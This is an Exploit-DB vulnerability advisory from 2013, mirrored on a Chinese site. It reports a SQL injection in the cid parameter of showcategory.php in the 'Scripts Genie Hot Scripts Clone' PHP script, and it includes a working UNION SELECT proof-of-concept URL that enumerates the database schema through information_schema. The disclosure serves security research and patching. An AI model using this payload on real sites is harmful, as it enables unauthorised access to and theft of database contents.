Scripts Genie Hot Scripts Clone – ‘showcategory.php?cid’ SQL Injection - 体验盒子

作者： Easy Laster

日期： 2013-02-18

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/24516/

-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ Security Flaw+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ __ _ +
+ _________ _ _/\ \ \___| |_ +
+/ __|/ _ \/ __| | | |/\/ / _ \ __|+
+\__ \__/ (__| |_| / /\/__/ |_ +
+|___/\___|\___|\__,_\_\ \/ \___|\__|+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+SQL Injection Vulnerability PoC +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+ Discovered by Easy Laster+
+Autor : Easy Laster +
+ Date :17.02.2013 +
+Script:Scripts Genie+
+Hot Scripts Clone Script+
+scriptsgenie.com+
+ Price::$1.75 +
+Language: PHP +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+Vulnerability +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Proof of Concept +
+Crawling the MYSQL Stack+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+